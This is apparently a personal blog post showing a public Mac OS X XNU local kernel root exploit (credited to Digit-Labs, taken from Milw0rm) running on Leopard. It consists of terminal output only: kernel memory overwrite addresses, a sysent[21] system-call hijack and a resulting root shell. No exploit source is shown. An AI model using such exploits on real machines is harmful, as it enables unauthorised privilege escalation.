HFS-fcntl Local Kernel Root exploit on Mac OS X (XNU)

I think I am using the latest, fully patched version of OS X (Leopard), but the exploit still works. Cool.

Jasmine:~ Cyberheb$ ./spl0it.sh
Apple MACOS X xnu <= 1228.x local kernel root exploit
 by: 
 http://www.digit-labs.org/ -- Digit-Labs 2008!@

* creating diskimage... done
* attaching/mounting diskimage... done
* executing exploit...

Apple MACOS X xnu <= 1228.x local kernel root exploit
by: 
http://www.digit-labs.org/ -- Digit-Labs 2008!@$!

* getattrlist...done
** attrlist length: 36
** fndrinfo:
* done

* setattrlist...done
* overwriting @0x0050A70C
* done

* setattrlist...done
* overwriting @0x0050A998
** sysent[21].sy_call: 0x0050A70C
* done

* jumping...done

* getuid(): 0
+Wh00t

bash-3.2# id
uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff),101(com.apple.sharepoint.group.1)
bash-3.2# uname -a
Darwin Jasmine.local 9.6.0 Darwin Kernel Version 9.6.0: Mon Nov 24 17:37:00 PST 2008; root:xnu-1228.9.59~1/RELEASE_I386 i386

The exploit is taken from Milw0rm. Thanks to super_temon for showing me 'bout this.
